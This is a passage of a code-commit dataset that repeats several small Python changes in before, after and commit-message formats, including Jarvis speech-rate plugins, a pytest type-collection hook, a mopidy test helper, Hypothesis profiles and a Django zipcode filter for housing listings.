"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | Add plugins for talking faster and slower | Add plugins for talking faster and slower
| Python | mit | sukeesh/Jarvis,sukeesh/Jarvis,sukeesh/Jarvis,sukeesh/Jarvis | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
Add plugins for talking faster and slower | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | <commit_before>from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
<commit_msg>Add plugins for talking faster and slower<commit_after> | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
Add plugins for talking faster and slowerfrom plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | <commit_before>from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
<commit_msg>Add plugins for talking faster and slower<commit_after>from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) |
cbabdf4210313f934ae90d9a853834d9494b3ad5 | tests/conftest.py | tests/conftest.py | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
| import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| Add configuration to collect types from pytest runs | Add configuration to collect types from pytest runs
| Python | mit | pytest-dev/pytest-bdd | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
Add configuration to collect types from pytest runs | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| <commit_before>import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
<commit_msg>Add configuration to collect types from pytest runs<commit_after> | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
Add configuration to collect types from pytest runsimport pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| <commit_before>import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
<commit_msg>Add configuration to collect types from pytest runs<commit_after>import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
|
2f1d32ba80816e3880a464a63d8f3f549a2be9e2 | tests/__init__.py | tests/__init__.py | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
| import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| Add IsA helper to tests to provde any_int, any_str and any_unicode | Add IsA helper to tests to provde any_int, any_str and any_unicode
| Python | apache-2.0 | bencevans/mopidy,diandiankan/mopidy,ZenithDK/mopidy,vrs01/mopidy,liamw9534/mopidy,dbrgn/mopidy,swak/mopidy,jodal/mopidy,SuperStarPL/mopidy,jmarsik/mopidy,bacontext/mopidy,woutervanwijk/mopidy,ali/mopidy,pacificIT/mopidy,woutervanwijk/mopidy,quartz55/mopidy,jmarsik/mopidy,dbrgn/mopidy,mokieyue/mopidy,bencevans/mopidy,mokieyue/mopidy,glogiotatidis/mopidy,adamcik/mopidy,hkariti/mopidy,tkem/mopidy,kingosticks/mopidy,rawdlite/mopidy,jodal/mopidy,mopidy/mopidy,adamcik/mopidy,jcass77/mopidy,jmarsik/mopidy,abarisain/mopidy,rawdlite/mopidy,mopidy/mopidy,swak/mopidy,jmarsik/mopidy,quartz55/mopidy,bencevans/mopidy,priestd09/mopidy,tkem/mopidy,SuperStarPL/mopidy,glogiotatidis/mopidy,glogiotatidis/mopidy,ali/mopidy,hkariti/mopidy,glogiotatidis/mopidy,pacificIT/mopidy,rawdlite/mopidy,ali/mopidy,priestd09/mopidy,kingosticks/mopidy,priestd09/mopidy,vrs01/mopidy,ZenithDK/mopidy,SuperStarPL/mopidy,pacificIT/mopidy,bacontext/mopidy,adamcik/mopidy,jcass77/mopidy,swak/mopidy,liamw9534/mopidy,vrs01/mopidy,ZenithDK/mopidy,mokieyue/mopidy,quartz55/mopidy,dbrgn/mopidy,jodal/mopidy,quartz55/mopidy,vrs01/mopidy,hkariti/mopidy,bacontext/mopidy,diandiankan/mopidy,bacontext/mopidy,abarisain/mopidy,kingosticks/mopidy,ZenithDK/mopidy,diandiankan/mopidy,diandiankan/mopidy,SuperStarPL/mopidy,tkem/mopidy,rawdlite/mopidy,hkariti/mopidy,jcass77/mopidy,dbrgn/mopidy,bencevans/mopidy,pacificIT/mopidy,mopidy/mopidy,tkem/mopidy,mokieyue/mopidy,ali/mopidy,swak/mopidy | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
Add IsA helper to tests to provde any_int, any_str and any_unicode | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| <commit_before>import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
<commit_msg>Add IsA helper to tests to provde any_int, any_str and any_unicode<commit_after> | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
Add IsA helper to tests to provde any_int, any_str and any_unicodeimport os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| <commit_before>import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
<commit_msg>Add IsA helper to tests to provde any_int, any_str and any_unicode<commit_after>import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
|
4ef14e5c791fbced79474e82a4268fb15d1c7854 | tests/conftest.py | tests/conftest.py | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| Add a “lots” Hypothesis profile (max_examples=100_000) | tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.
| Python | artistic-2.0 | ppb/ppb-vector,ppb/ppb-vector | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky. | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| <commit_before>def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
<commit_msg>tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.<commit_after> | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| <commit_before>def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
<commit_msg>tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.<commit_after>def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
|
cf9012ff2f6bf745d46f35923f95b6ce0b9d91e1 | homeful/views.py | homeful/views.py | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
| from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| Add zipcode filter for MFPs. | Add zipcode filter for MFPs.
| Python | mit | happyhousing/happyhousing | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
Add zipcode filter for MFPs. | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| <commit_before>from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
